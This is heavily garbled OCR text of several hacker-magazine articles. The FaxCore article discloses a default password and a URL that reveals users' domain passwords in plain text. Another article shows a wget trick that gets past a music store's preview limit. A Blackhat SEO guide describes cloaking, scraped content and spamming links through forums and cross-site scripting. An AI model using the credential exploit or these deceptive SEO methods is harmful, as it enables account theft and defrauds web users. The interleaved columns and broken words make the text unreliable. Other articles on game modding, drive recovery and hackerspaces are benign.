one referenced wi th i n the documentat i on; page, you are abl e to go t hrough the user l i st,
however, there are a few other system i mpersonate each u ser, and vi ew a l l of thei r
accounts vi s i bl e i n screenshots shown i n faxes. Here i s where I started t o do some
the manual . Knowi ng that a good system research. I knew that the FaxCore system used
admi n i strator wou l d change the password to tokens to automat i cal l y fi l l i n i nformati on on
the admi n account as soon as FaxCore was noti fi cat i ons and cover pages. One of t he
i nstal l ed, I l ooked for ot her means of l oggi ng tokens i s " $ $USER . PASSWORD$ $ " . Now, as
i n . So I t r i ed one of the other accounts l i sted I sai d earl i er, we used the Acti ve Di rectory
i n the screenshots. "SYS- UNROUTED" opt i on to i mport our u ser l i st i nstead of us i ng
i s a system account created for i nter nal the i nter nal FaxCore user database. I al so
operat i ons. No s urpr i se: i t al so s hi pped wi th knew that the password token was used to
a password of "password", but because ema i l u sers thei r forgotten passwords. But I
the account does not have admi n i strator wanted to see if the FaxCore system stored
access, i t was over l ooked and thought of as the passwords of Acti ve Di rectory users, so
a "non-threat. " I now was l ogged i n to the I desi gned a cover page wi th i n the FaxCore
system as "SYS- UNROUTED" . Thi s account cover page edi tor wi t h the password token
hol ds a l l of the unsorted faxes that have been u sed on i t, and then I sent a fax to mysel f .
recei ved. Thi s i s a potenti al threat but not the When I recei ved the fax, m
y
password
.
was
l[
C 2

2 %
[
ZmC
there i n pl a i n text. It had been stored i n t he
FaxCore database when I l ogged i nto t he
system. My goa l became the abi l i ty to get t he
password of a l l the u sers wi t hout h avi ng to
send a fax from each one of them.
I d i scovered, wh i l e goi ng through t he
faxes I had sent, that there was a page named
"Test Tokens. " Upon c l i cki ng on t hat l i n k, I
was greeted wi t h a page that showed what
each token woul d di splay i f used. Th i s page
a l so i ncl uded my password-ri ght there,
i n pl ai n text. I had fou nd i t. Al l I needed
was the di rect l i n k http : / / faxcore .
-d o m a i n . l o c a l / a p p s / m e s s a g e
-V i e w e r / d e l i v e r y T e s t T o k e n s .
-aspx ? xUs e r I D= and t he user l i st avai l abl e
after l oggi ng i nto t he admi n i strator accou nt,
and I was set. Each user has a u n i que i d,
and when t he id i s entered at the end of t he
URL, the page wi l l retu rn a l l of the tokens
ava i l abl e, i nclu di ng t hei r doma i n l ogi n name
and password.
Thi s system has many vu l nera bi l i t i es, but
t hi s was our greatest concern. Everyone i n
the company, i ncl u di ng o u r presi dent, uses
the FoxCore software and wou l d h ave been
i n danger of havi ng thei r i nfor mat i on open l y
made ava i l abl e. We have corrected t he i ssues
on our server; however, a patch has not been
i ssued to correct these probl ems. So, other
FaxCore customers are wi de open and sti l l
vul nerabl e to t hi s expl oi t.
As I revi ewed t he FaxCore source code,
the bi ggest probl em I found i s that t he onl y
ver i fi cat i on of whi ch us er you are i s u pon
l ogi n. Once you're l ogged i n, you r credenti a l s
a re never aga i n checked. Th i s l eaves t he system
wi de open. As t hi s probl em i s pai red wi th a n
i mpersonat i on fu nct i on wh i ch s i mpl y uses a
nu mbered accou nt to gi ve you fu l l access, I
a m s urpr i sed t hi s vu l nera bi l i ty i s n't common
knowledge yet. So t hi s i s my contr i but i on to
the 2600 commu n i ty.
Shoutout to Element!
R E S H AC K I N G
W I N D O W S
by Vitami nion
vi tami nion@gmai l . com
I f you have Wi ndows Vi sta, then by now you
have probably tri ed i ts versi on of the classi c
ti me-wast i ng game Mi nesweeper. You may have
noti ced di fferences between the Vi sta versi on
and i ts predecessors. The Vi sta versi on has snaz
zi er graphi cs, ani mated explosi ons and a wei rd
sweepi ng beam of li ght when you wi n.
But i t sti ll gets bori ng fai rly qui ckl y.
V I S T A G AM E S
and cli ck Open Fi le Locat i on on the Shortcut
tab. You want to work on a copy i n case you
screw somethi ng up.
Launch ResHacker and use it to open your
copy of M1 lC'wC CCt . O1 i . You wi ll see a tree
li st of folders. Many of Mi nesweeper's setti ngs
are kept in an XML document and are s i mpl e
to edi t. After each change, be sure to save your
work i n ResHacker before fi r i ng up your game.
Here are a few examples of thi ngs you can
do:
Thi s art i cle wi l l expl ai n how to customi ze
Unlock the hidden debug menu
Vi sta's bu i lt- i n games, usi ng Mi nesweeper as
Use ResHacker to open MlDCvCCCt . CC.
the mai n exampl e. I t wi l l al so gi ve you an i ntro-
mu i , whi ch wi l l be in a folder i nsi de the Mi ne-
ducti on to the basi cs of Res Hacker, a powerful
sweeper fol der. On my system, the fol der i s
freeware Wi ndows program ava i l able at
cal led en-US, but yours mi ght be di fferent. I n
ht tp : / /ww. angus j . com/ resourcehack
er
/
.
Res Hacker, open the
M[| fol der, then the 1 64
The latest versi on of ResHacker was released
fol der and then cl i ck the 1 033 resource i nsi de.
i n
2002, and its author no l onger supports i t, so
See the text for the Debug menu opti ons?
Res Hacker i s not a new program, but i t's sti l l
Now you can repl ace the bor i ng ol d menu
fun to use. I t's a good way for novi ces to poke
opti ons wi th the hi dden ones. Open the 1 63
around appli cati ons wi thout needi ng program-
folder, whi ch contai ns the bor i ng old menu;
mi ng knowl edge.
then, ri ght-cli ck the 1 033 i nsi de and delete i t.
Fi rst, make a copy of your Mi nesweeper
Ri ght-cl i ck the 1 033 i nsi de the 1 64 fol der and
fol der, whi ch i s probabl y i n Program l i C3 \ rename i t to 1 63. Save.
Microsof t Games . To fi nd i t, ri ght-cl i ck Mi ne- Launch Mi nesweeper and you' l l see the
sweeper i n your Start menu, choose Properti es Debug menu. I t has four opti ons. "TQggl e Show
ulumn 2d

2
Mines" wil l show you al l the mines, but you
must select it after you have clicked at least one
square to start playing. "Win" forces an auto
matic win.
Solitaire, Spider Solitaire, Hearts, Freecel l
and even Purbl e Pl ace al l have hidden Debug
menus with cheats and other secrets; in fact,
Purble Place has several hidden menus.
Make a bi gger mi nefi el d than the
24 by 30 board the game al l ows
Use ResHacker to open Mi nesweeper . dl l .
Open the UI \ MINESWEEPER . XML folder inside.
Find the tags MaxBoardWidth and MaxBoard
Height. These numbers define the upper limits
of the board size. Change them as you pl ease,
save, and launch the game.
Go to the Game menu and choose Options.
The box still says the width and height limits are
24 and 30, but you' ll find that they aren't. You
can al so change the l imit on the number of mines
by changing the number in the MaxMines tag in
that same UI \ MINESWEEPER . XML resource.
Change graphi cs, sounds
and other setti ngs
Use ResHacker to open Minesweeper . dl l .
subfolders containing the game's sounds and
graphics, which you can repl ace with your
own.
For exampl e, open SHEETS \ BLUESHEETlX2 l .
JPG. Right-click the 1033 and choose "Save
[ DATA: SHEETS\ RLUESHEETl X21. JPG : 103 3 ] ".
Save the JPG fil e. Edit it however you want.
Then right-click the 1033 and choose "repl ace
resource." Browse to your edited JPG, enter the
top- l evel fol der, which in this case wil l be DATA,
as the resource type and the subfol der, which
in this case will be SHEETS \ BLUESHEETlX2 l . JPG
as the resource name. Leave the l anguage fiel d
hl ank. Save and launch Minesweeper.
These are j ust a few exampl es of what you
can do with ResHacker. Poke around a l itt l e bit,
and you' l l find that you can change the anima
tion speed for Minesweeper's expl oding mines,
change the text of menus and error messages,
and do much more.
I t wou l d probably take a book to describe
everything ResHack can do, even for a small
game l ike Minesweeper or Solitaire. Hopefu l ly,
this article has encouraged you to check it out,
play around, and most importantly, have fun

_
e
_

by mOther
Bleep ( ht tp : / / www . bl eep . com/ ) i s Warp
Records' online MP3 and FLAC store. You can
purchase music and download it, much l ike
iTunes, except without any DRM. Warp's catalog
is avail able, as is music from many other record
label s, including Domino, XL Recordings, Rough
Trade, and Skam.
You can preview al l tracks using their Flash
player. The annoying thing about this player
is that it stops the playback after 30 seconds,
and you have to click on the seek bar to start it
playing again. I 'm guessing that they did this to
stop people from recording the stream.
After a littl e hacking around, I discovered an
easy way to download the full MP3s.
Track links look like this: ht tp : / / www .
bl eep . com/ pl ayer . php? t rack= <rel easeI D>
-_DM- < track>
releaseID i s a code corresponding t o the
album, and track is a two-digit numher, such as
01, which is obviously the track number of the
the mp3 from the fol lowing URL: h ttp : I I
! ! : ten . bl eep . cor/ pl ayer . php? key= <key>
I discovered this by using Ethereal to snif
the http traffic. The above uri returns the mp3 in
its entirety. The Flash player itself is what stops
playback after 30 seconds. So, you can retrieve
the mp3 as follows:
wge t ' tes t . rp3 ht tp : / / l i s ten . bl eep
. com/ pl ayer . php? key=<key>
I was going to try to determine how the key is
calculated from the release I D and track number
(database l ookup?), but then I realized that I
needn't bother. It's a lot easier to j ust navigate to
the first URL and parse the key out of the HTML.
I ' ve written a simpl e python script which
automates this process. Run it without any
parameters for detail s on how to use it. The script
also extracts the album cover, as wel l as the artist
and album names. Read the source for details.
Don' t be a j erk. Buy the music you enjoy, and
support the artists. Remember, these MP3s are
only 96kbps (or l ess). Trust me: Autechre sounds
excellent in FLAC.
song.
The scripts mentioned in this
This URLretums the HTMLcodetoembedtheir
article can be downloaded from
Flash MP3 player andto pass the player parameters
the 2600 Code Repository at
such as the track title. One of these parameters is
"k". This key is used by their pl ayer to retrieve
http://www.2600.comicode/

[
C 22
2 %a
[
aZnC
. .. .. -.
.\1\."1 1
. . .. . ... -. .
1 IU\'I . \. U
by Pri esT
pri esti naround@gmai l . com
I enjoy my work, for the most part. Once
I look past the dealing with stupid idiots and
frustrating computers, the small computer
repair business I am employed at really is an
interesting place.
I t is no secret that my passion lies in secu
rity, and it is obvious to my co-workers that my
heart skips when I am set to recover a 000
password off of a laptop or to fix a problem in
the local network. This is all very intriguing,
but the latest encounter I have had was directly
related to a secure "thumb drive."
Here is the story that our customer gave us,
more or less. Apparently this gentleman needed
desperately to access the many important docu
ments that he had on his I mation-brand flash
drive. The drive claims to prevent access to all
data unless the correct password is entered into
a small utility, which then allows you to see the
files. Also, after six failed password attempts,
the drive wipes itself, destroying any data and
preventing all access, supposedly. Einstein
here had done just that, and he wanted his
data back. 50 I set to work. The drive was a 2
gigabyte I mation 18405, which seemed to have
been discontinued recently. On inspecting the
layout of the drive, I found that it had a small
hardware switch that controlled write protec
tion, and a small program that controls if the
files on the drive are visible or not.
For those who don' t know, the I mation secu
rity feature allows you t o choose how much
data to hide and how much to keep public by
splitting the drive into private and public parti
tions. In this way, the private partition remains
hidden until it has been activated by a windows
executable called lock. exe. This program
allows the partition to be viewed as if it were a
normally mounted drive.
50 my first step in poking around in this
small drive was the I mation website. Naturally,
there was no information on password recovery
listed there. My next step was the internet,
which also came up empty. At this point, my
Ever since I saw an episode of Hak. 5 online
( ht tp://w . hak5 . org/ archi ves/1 6 9 ),
I have been nervous about running our data
recovery programs on a customer ' s flash drive;
they are of course meant to be used on physical
hard drives. "But," I thought, "what the heck?
I t's not like this guy would gain anything by not
running the programs."
At this point, I had a USB drive which was
only 2 megabytes in size. This was because
when the disc was formatted with lock . exe,
the user had decided to keep as much of
his data secured as was humanly possible.
I couldn' t really do much here. Using the
lock. exe utility again, I managed to erase the
password and to start anew with the settings
reversed, with 2 megabytes of secure data and
the rest left public. Now there was something
to work with.
50 I ran ou r first data recovery program.
I t found a grand total of one file, woohoo!
This file was none other than the lock . exe
file that was readily viewable anyway. What
happened next was very odd. I then ran our
second program, GetBackData for FAT, and
I recovered every single file the user had lost
after encrypting his drive.
The result was a bunch of . doc files. Once
the customer came in to pick up his drive, I told
him about the process and asked to confirm if
these were the files he had created after locking
his drive down. He confirmed that they were.
50 in conclusion, I was actually surprised
that data recovery worked. I was more surprised
by the fact that it was on a flash drive than by
the fact that I was recovering "locked" data. I
think that the idea I mation has here is a very
good one for basic consumers, but against a
dedicated adversary, it may not stand up to
par.
Li nks:
I mation18405: http : / /w. provantage .
-com/ i mat i on- 1 8 4 0 5 - 7 3 MDS2 Jl . htm
Lock. exe download location:
ht tp : / / www . imat i on . com/ sllpport /
-driver s / lmat i onLOCK . exe
GetBackDatafor FAT: ht tp : / /w. run t i me
-. org/ data- recovery- s of tware . htm
boss offered an interesting suggestion: run data Shout out: gamer4goood.
recovery on it.
2J
ulumn 2d
BLackat SEQ:
ExpLoitrrgThe Dumb
MCe to Make A Profit
by i l i kenwf
parwok@gmai l .com
A steady i ncome i s necessary these days,
especi a l l y for geeks and hacker types. Wi th
a l l of the wonderfu l devi ces and hardware
upgrades that come out every day, we tend to
spend great deal s of money to keep our tech
nol ogy addi ct i ons sati sfi ed. So, a suppl ement
to the wal l et wou l d be wel come, ri ght? I f you
know you r way around the I nternet, there i s a
pretty si mpl e way to make decent amounts of
money on l i ne. The onl y t hi ngs needed are PHP
ski l l s, a good web host, some domai n names,
and i gnorant peopl e l azi l y s urfi ng to you r s i tes.
Wi th these t hi ngs combi ned, you're ready for
B l ackhat Search Engi ne Opt i mi zati on.
What is i t?
Set I t Up
Ass umi ng that you have a good web host,
the fi rst step is to set up you r content manage
ment system on a doma i n. Pi ck a domai n that
fi ts the ni che that you want to a i m you r si te
at. You can use subdomai ns or set up fol ders
wi th i n a doma i n i n order to serve as mu l t i pl e
si tes, al though one si te per doma i n wi l l keep
you r si tes i ndexed for a l onger peri od of t i me.
I nvesti gate keywords rel ated t o your si te's
topi c, and try to fi nd some that are often
searched for, but whi ch yi el d no to few search
resu l ts. I nsert keywords i nto the content areas
and meta tags on a l l of the s i te's pages. Once
t hi s i s compl ete, total l y tweak the l ook of you r
si te. Modi fy an exi st i ng free templ ate, or create
one of you r own. Photoshop together some
semi -good graphi cs and sl ap them up there
whi l e you're at i t. Assumi ng you are us i ng
Wordpress, you shou l d make s ure to i nsta l l
WP-O-Mati c, a pl ugi n that converts RSS feeds
i nto posts, a l l owi ng keyword rewr i t i ng. Other
Wordpress pl ugi ns wh i ch a re geared speci fi
cal l y toward SEO, such as t he a utomat i c meta
tag generators, are h i ghl y recommended.
Bl ackhat SEO i s the pract i ce of putti ng
up content- r i ch websi tes i n an automated
way. Once these s i tes a re up and r unni ng,
the goal i s to get them i ndexed for a set of
n i che keywords. Once i ndexed in the search
engi nes for these keywords, a B l ackhat SEO
wi l l pl ace advert i sements or sneaky redi rects
Automatic Content
to affi l i ate offers i n strategi c areas on the s i tes.
When you r si te i s r un n i ng l i ve and l ooki ng
The goa l i s t o gai n as many c l i cks or sal es as
good, fi nd severa l RSS feeds off of s i tes rel ated
possi bl e from the u nwi tt i ng users who vi s i t.
to your n i che, and pl ug them i nto WP-O-Mati c.
Some peopl e manual l y set u p each si te, one at
Use t he repl ace functi on on al l of them as a
a t i me, i n order to avoi d footpri nts that Googl e
precaut i on t o swap out common keywords, so
and i t s i l k are abl e t o see. Such footpr i nts can
t hat you r content appears to be u ni que. Set up
get you r s i tes removed from search engi nes'
a cron j ob to cal l one of the many free PHP
i ndexes very qu i ckl y. I usu a l l y u se Wordpress,
pi ng scri pts hour l y, to publ i ci ze you r pages
and get them i ndexed. Make sure to use a
as there a re eas i l y modi fi abl e templ ates out
pi ng scr i pt that i s on you r server and whi ch
there whi ch can hel p bl end you r si tes i nto the
sends the RPC requests from you r server. Thi s
bl ogosphere, and many pl ugi ns whi ch provi de
keeps you r s i te from bei ng reported as spam
SEO funct i ons to get you r s i tes i ndexed qu i ckl y
t o t he search engi nes by servi ces l i ke Pi ngoat.
a re readi l y avai l abl e. There a re speci a l i zed
Try to get backl i nks to you r s i tes by ei ther
products, whi ch I won't name, avai l abl e for
outsourc i ng or manual l y submi tt i ng you r
purchase to a l l ow a utomat i on on a gi gant i c
s i te to a few hundred to a few t housand l i nk
scal e. These us ual l y have detectabl e foot-
di rectori es. Be gradual when bu i l di ng l i nks to
pr i nts, u nl ess they a re desi gned to mass i nsta l l
make the accumu l at i on of these l i n ks appear
a product and not actu a l l y create the si tes.
nat ura l . The more l i n ks to you r s i te, the hi gher
Even then, sl oppi ness can l eave footpr i nts that
i n the search engi ne ranki ngs you r pages wi l l
end up gett i ng a l l of you r s i tes removed from
appear. I f you feel l i ke bei ng extremel y evi l ,
the i ndexes. you can fi nd and use tool s to mass spam l i n ks
`
l[
C 2 2%
[
ZnC
on for ums, comments, or by us i ng cross si te
scri pti ng. Be carefu l when you do t hi s ! These
programs and scri pts are easy to fi nd, and I
ass ume that 2600 readers are qu i te capabl e of
fi ndi ng them on you r own.
Get I ndexed and Monetize
The onl y step l eft i s to wai t. There wi l l
a l ways b e a few of you r si tes that don't get
i ndexed very qu i ckl y or at a l l by one or more
search engi nes. Somet i mes it takes a l ong t i me
for the s l ower-crawl i ng engi nes t hat aren't as
popul ar as Googl e t o add new si tes. When
you have a mi n i mu m of 1 00 resu l ts i n at l east
one maj or search engi ne, put affi l i ate offers or
pay-per-cl i ck advert i sements on a l l of you r the
pages. For affi l i ates, ei ther embed the offers,
or use cl oaki ng scri pts to send a l l non-spi der
vi si tors t o a sal es page. Use an I P f i l ter coupl ed
wi th a user agent checker scri pt. For pay-per
cl i ck advert i sements, make s ure to pl ace the
ads strategi cal l y so that they are i n pl aces that
users are l i kel y to cl i ck. The best areas are
around the ri ght- hand scrol l bar, as wel l as i n
the dead center of the page. Use mu l ti pl e ad
networks to avoi d the footpri nts that search
spi ders can use to i denti fy and remove your
si tes from thei r i ndexes. From there, repeat the
process on more si tes. I f you feel brave, you
can put a Googl e custom search up for each
of you r si tes, as they al l ow you to pl ug i n you r
AdSense I D for search res ul t advert i sements,
and you can speci fy what si tes your custom
search i ncl udes. Remember that you can put
more si tes on s ubdomai ns or i n fol ders, or
buy 99 cent . info domai ns for each of you r
Bl ackhat si tes. Qnce you get Bl ackhat SEQ
wi th Wordpress down to an art, you can grad
uate to more advanced methods that i nvol ve
cron j obs gal ore, mass i nsta l l ers, markov
engi nes, and other ways of scrapi ng content,
or j ust keep doi ng what works for you. What
ever happens, good l uck, and be carefu l !
AdSense i s real l y str i ct and wi l l ban you r
websi tes i f they determi ne them to be
"spammy." Use PeakCl i ck fi rst, then use
AdSense when you have several s i tes. I f you
wi sh to use one ad network, have a PHP scr i pt
that onl y di spl ays you r advert i sements and
thei r code t o real users, and not to the search
engi ne bots.
Another good way to make some money
off of you r s i tes is to i nsta l l the Text- l i nk-Ads
advert i si ng scri pt. Thi s scri pt, whi ch by desi gn
i s carefu l l y h i dden from search bots, can
di spl ay ei ther context ual l i n ks or ol d fashi oned
l i n ks on you r si tes. They are al so worki ng on
a pay-per-cl i ck network, among other new
monet i zati on methods.
At the t i me of wri ti ng, new members are
currentl y not al l owed to j oi n, but i n the future,
NetAudi oAds may provi de another avenue
i n whi ch you get pai d for every real user by
havi ng audi o-onl y advert i sments pl ay for
fi ve seconds when they vi si t. Annoyi ng, but
effecti ve.
I know many other methods, and tool s, but
I can't menti on them by name, as I don't wi sh
them to become usel ess i n my eforts t o t ur n
a profi t. Di scover them for you rsel ves. I t i sn't
that hard if you can fi nd the ri ght dark corner
of the I nternet.
If you can add some form of usefu l ness to
any of you r si tes, do so, as it wi l l attract traffi c
and deter spam h unters from report i ng you to
the search engi nes.
Useful Si tes
Syndk8 is the defi ni ti ve resource for
Bl ackhat SEQ. Regi ster, and l earn from the
masters. ht tp : / / syndk8 . ne t
B l uehat SEQ has many usefu l posts that
descr i be l i n k bu i l di ng, and a pay servi ce to get
i ndexed qu i ckl y. ht tp : / / bl uehat s eo . com
Notes
Di gi ta l Poi nt For ums is a Whi tehat si te,
A good way to get traffi c is to part i ci pate
but can be usefu l for our own twi sted needs.
i n Stumbl eupon exchanges on the Di gi ta l Poi nt
http : / / f orums . digi tal point . cor
forums. Thi s works for both Whi tehat and
PHP Pi ng Scr i pt: copy i t t o you r server, get
Bl ackhat si tes.
the RPC pi ng l i st from Syndk8, modi fy i t to fi t
Di gi ta l Poi nt al so has a free co-op adver-
you r purposes, and use a cron j ob to have cur l
t i si ng networ k goi ng, i n whi ch you ear n credi ts
vi si t the URl of the pi ng scr i pt every hour or so.
by di spl ayi ng other peopl e's advert i sements,
h t t p : I I s n i p p e t s . d z o n e . c om I p o s t s I
and can i n exchange advert i se you r si tes. Thi s
show! 3 3 2 9
i s great and can provi de many hu ndreds of
YACG (Yet Another
Content Generator)
free backl i n ks when you r si te gets si gni fi cant
i s a great tool that bui l ds si tes automati cal l y,
traffi c.
pu l l i ng from var i ous content sources and
Thi s practi ce i s current l y not i l l egal anywhere markovi ng them. Make s ure to modi fy or bui l d
that I am aware of. Spammi ng vi a ema i l adver- a new templ ate! See the for ums to l earn about
t i s i ng i s i l l egal i n many ways. let's be carefu l ,
footpri nts and add-ons for further u sefu l ness.
so that t hi s doesn't get out l awed as wel l . ht tp : / / ge tyacg . com
ulumn 2dl[
C 2
.
Hacker Perspective
N Ck dff
"Far these peaple, there' na separatian between wark and fun. "
- Aaron Swartz (www. aaronsw. cam)
On any given Monday night, j ust 2. 5 mil es
This fascination with hacker genius is why I
up the hil l from the White House, you ' l l find
work to hel p bui l d communities of hackers, to
a group of hackers gathered together a round
bring hackers together to share their t al ents and
microcontrol l ers. I n one corner of the room,
tackl e l arger tasks. My core bel ief is that these
hackers are busy working on code, trading
communities wil l show society at l arge what
techniques, and hammering out bugs . I n
hacking rea l l y is and who hackers rea l l y are.
another, hackers a re busy cutting wire, fil tering
My core ta l ent is hacking bureaucracies and
t hrough bins of chips and components,
hierarchies,
gaining a deeper understanding
sol dering and desol dering components whil e
of networks of peopl e in order to patch their
gent l y critiquing each other's work.
prej udices so our community can hel p the
Most of the peopl e in the room, however,
wor l d as a whol e.
a re "newbies. " They're off t o the side, fasci nated
f The irst "organizational hack" I was
by these hackers making cool things out of a
pil e of parts. Through carefu l observation,
invol ved in was moving the Ann Arbor 2600
some idl e chatter, and a few questions about
meetings from a nearby ma l l into t he Universi ty
h k
Of Michigan Student Unl on. The Unl on had
t e wor i n progress, they're getting a cl earer
d f h h I I
a l ot of rea l l y great meeting spaces, but the
i ea 0 w at t ese sma components do and
bureaucratic hurdl es were a bit much for a l l
how they come together.
In a few Mondays, after getting a l ittl e
but the most organized and establ ished student
experience with a sol dering iron, a few code
groups. I n retrospect, it wasn't a l l that hard to
sampl es, a bit of encouragement, and a kit of
register a student group, get a few regul ars to
their own, a few of these newbies wil l start
chip in some cash, and l obby some academic
contributing ideas and hacks of their own
departments and even the IT group to match
and be recognized by their peers as fel l ow
what we coul d scrounge up at a meeting. At
hackers.
the time, it seemed l ike a l ot of work - but it
This is a l l happening in a space cal l ed
was wel l worth it for what we got .
Hac DC, an independent hackerspace founded
We had fast, wired I nternet access ( this
and funded by hackers to share knowl edge,
was a few years before Wi- Fi took off), l ots of
resou rces, and the cr ux of what hacking is
power out l ets, a huge board room tabl e with
rea l l y about. "Microcontrol l er Mondays"
big comfy chairs, no security guards l ooking
a re j ust one exampl e of how HacDC brings
over our shoul der, a food court downstairs -
hackers together to expl ore where technol ogy
what more cou l d we have asked for? We even
meets a rt, cu l t ure, pol itics, economics, and
had a proj ector and a screen we cou l d use to
many other fiel ds.
give presentations! To some of you, it might
Since my first Ann Arbor 2600 meeting,
not sound l ike a l ot. B ut to us, it was much
sometime i n t he mid 90s, I 've been fascinated
better t han the mal l .
by those who ca l l themsel ves hackers. I f I 've
I t wasn't l ong before we found other
ever been rel uctant to cal l mysel f a hacker,
bureaucratic hurdl es to expl oit. At one
it's because I 've been in awe of what other
meeting, we found out that Microsoft was
hackers are working on and the depth of
going to be throwing a big event in one of the
knowl edge and creativity hackers bring to their
upstairs bal l rooms to hel p sel l these l imited-
work. I ' m rea l l y bl own away how bril l iant our
instal l "student" versions of Office. Most of
community is, how quickl y hackers achieve a
us were abandoning cl osed source software,
deep understanding of compl ex systems and
even throwing unofficia l distro parties du ring
find ways of br ushing aside l imitations and
our meetings. Whil e we cou l d see the end of
a rtificia l boundaries. Hackers bel ieve anything cl osed source software in the server mar ket
is possibl e and work very hard to prove it - (especial l y those of us cal l ed upon to "fix"
often j ust for fun. Exchange servers on a dail y basis), open
` l
[
C 2 2%
[
ZnC
source desktop software sti l l had a l ong way Oddl y enough, I sti l l get a bi t of th i s
t o go. But at l east i t was there! prejudi ce agai nst the term when I tal k about
Through some cl ever soci al engi neeri ng, HacOC I t's pronou nced " Hack- O-C" and
sympathet i c admi n i strators, and a better when I ' m talki ng about it to a non-techni cal
knowl edge of t he ru l es t han those cal l ed audi ence, I often end up goi ng i nto a l ong
upon t o enforce them, we were " i nvi ted" to explanat i on as to who hackers rea l l y are
demo the fi rst versi ons of what's now known and what hacki ng rea l l y i s. Fort unately, th i s
as OpenOffi ce at the event Mi crosoft pai d for! is gett i ng a lot eas i er, t hanks to the great
Whether or not someone bought a Mi crosoft work hackers a re doi ng and the wi l l i ngness
product that day, few peopl e l eft wi thout of hackers to tal k about thei r commu n i ty
gett i ng a free copy of StarOffi ce from us to try wi thout fear of bei ng branded as a cr i mi nal.
at home. Whi le the si de-by-s i de compar i son Now that there's a space i n DC, I can i nvi te
wasn't as good as it is today, we began to show people to drop by to see what hacki ng is for
the l arger commu n i ty that there were good, themsel ves! .
free open source al ternati ves that they could Most of what kept me goi ng dur i ng HF's
hel p make better! long appl i cat i on process was a des i re to chi p
After col l ege, I foll owed some of these away at t hi s prej udi ce, to prove that we cou l d
fr i ends from Ann Arbor ou t t o Cal i for ni a, ri ght proudl y call ou rsel ves hackers and achi eve
at the t i me when the dot-com era was comi ng the same federally recogni zed status enjoyed
to a close. It was there that I encountered a by those who ca l l themsel ves academi cs,
hackerspace call ed New Hack Ci ty. I n what researchers, human i t ar i ans, teachers, and
used t o be a sweatshop, hackers from the Cul t other l abel s easi ly i ntercha ngeabl e wi t h
of t he Dead Cow and thei r fr i ends had created "hacker. " I n the process of appl yi ng for 501 (c)
an i nsa nel y awesome space. Most peopl e ( 3) status, we had t o show how hackers pl ayed
only got to see the dance floor, but beh i nd all these di fferent roles.
a movi ng wall hi d a very large hacker lab, Nearly two years after fi rst bei ng told
fi ll ed wi th mach i nes, robots, tools, and spaces i t couldn't be done, HF achi eved 501 (e)
where hackers got together to bu i l d i nsanely (3) stat us. Si nce then, many other hacker
cool t hi ngs. organi zat i ons have appl i ed for exempti on,
The one bad th i ng about New Hack Ci ty was proudl y usi ng the word hacker wi thout
that i t was a rel ati vel y cl osed, ti ght- kni t group fear of bei ng a utomati call y rejected. One
of people who reall y di dn't want to open up of t he most powerfu l accompl i shments of
thei r space to all but a few trusted fr i ends, l et THF was provi ng that i ndependent hackers
a l one the genera l publ i c. Ulti mately, beca use and projects could appl y for 501 (c)(3) status
they fa i l ed to attract new peopl e to help pay wi thout a l ot of money or outsi de expert i se . . .
the rent, the space ended up cl osi ng. that hacki ng was a "tax exempt act i vi ty. " Many
I t was a round thi s ti me that I began to gpt of the hackerspaces formi ng today, i ncludi ng
i nvol ved wi t h nonprofi t organi zat i ons. There's HacOC, are apply i ng to become 501 (c)(3)
a type of nonprofi t organi zat i on cal l ed a 501 (c) organi zat i ons so they GI n more eas i l y seek
(3) t hat's both exempt from federa l tax and i s fundi ng and resources from the commu n i t i es
authori zed to accept tax-deducti ble donati ons they serve.
from i ndi vi duals and corporat i ons. When Thanks to a hackerspace i n Berl i n, HF
most people th i n k of a "rea l " nonprofi t, they're embarked on what is probabl y one of the
th i nk i ng of a 501 (c)(3). I n contempl at i ng the greatest orga ni zati ona l and soci al hacks I 've
fai l ure of New Hack Ci ty, and seei ng that been i nvol ved wi th. HF was i nvi ted to 23C3,
hackers di dn' t reall y have a way of gett i ng t he 2 3 rd annual Chaos Commu n i cat i on
i ndependent fundi ng for t hei r projects, I Congress i n Germany, and I spoke there on
embarked on another bureaucrat i c hack that behalf of the fou ndat i on. I was i ncredi bl y
event ual l y became The Hacker Fou ndati on. i mpressed by t he Europmn hacker scene,
To become a 501 (c)(3), you have to form somet hi ng I had onl y tangenti a l l y seen at
a corporat i on and appl y wi th the I RS to gai n hacker events here i n the U. S.
recogni t i on as a tax-exempt nonprofi t. Most What rea l ly fl oored me was seei ng C- Basp
organi zat i ons don't even attempt i t wi thout (c- base. org), a l a rge, open, and i nvi t i ng
the help of a CPA and an attorney. Nobody commun i ty of hackers who had bu i l t what
thought a group of hackers could gai n I vi ewed as New Hack Ci ty on steroi ds.
recogni t i on for an orga ni zati on cal l ed "The Upsta i rs was a dance floor r i nged by a bar,
Hacker Fou ndat i on" wi thout a lot of outsi de l oft workspaces, a huge OJ boot h, publ i c
help. Most people t hought we shou l d j ust gi ve termi nals, and an evpr changi ng ar ray of
the organi zat i on a more i nnocent sou ndi ng decorati ve technol ogy. Downsta i rs, they had
name - that we'd be shoot i ng ou rsel ves i n t he almost every k i nd of speci al i zed workspace
foot by us i ng the word "hacker" i n our name. a hacker cou l d want, everythi ng from a fully
ulumn2d
la
[C 2
stocked server room to a recordi ng studi o and thei r European hacker fri ends t o thei r fel l ow
a woodworki ng shop! One of my fa i l i ngs as
hackerspace members. I t was awesome to
a wri ter is an i nabi l i ty to fu l l y communi cate
see other spaces i n the u. s. get to meet and
what an i mpress i on t he C-Base had on me. I f
networ k wi t h each other. We had groups from
you're i nterested i n seei ng what a hackerspace
a l l parts of North Ameri ca, l i ke Noi sebri dge
can be, I strongl y encourage you to attend thi s
from San Franci sco, t he Texarkana I nsti tute
year's congress i n Berl i n, the 25C3 (events.
of Tech nol ogy from Arkansas, and east coast
ccc. de) and vi s i t the C-Base. My hope i s that
one d H DC 1 1 h
.
W h t
" l oca l s" HacDC, NYCResi stor, the Hacktory
ay ac V| ac l eve In as I ng on
what C-Base has achi eved in Berl i n.
from Phi l l y, a nd even representati ves from
Seei ng the
C-Base, I knew that hackers from
hackl ab. to i n Toronto! We had a huge
thi s si de of the Atl ant i c wou l d be i nspi red. I
mi crocontrol l er workshop, a ci rcui t bendi ng
had been encouraged by Germans to br i ng
l ab, our own hackersmart wi th parts and
hackers from Ameri ca over t o Europe for t hei r
ol d bi ts of hacker h i story, and a l i ve l i nk to
hacker camp happeni ng l ater that year. I ' m t he Metal ab i n Vi enna! Most i mportantl y,
not qu i te s ure if it was enti rel y coi nci dental , these gi fted hackers dedi cated t o bui l di ng
but they had schedu l ed camp t o happen ri ght
communi ty got to meet and soci a l i ze wi th thei r
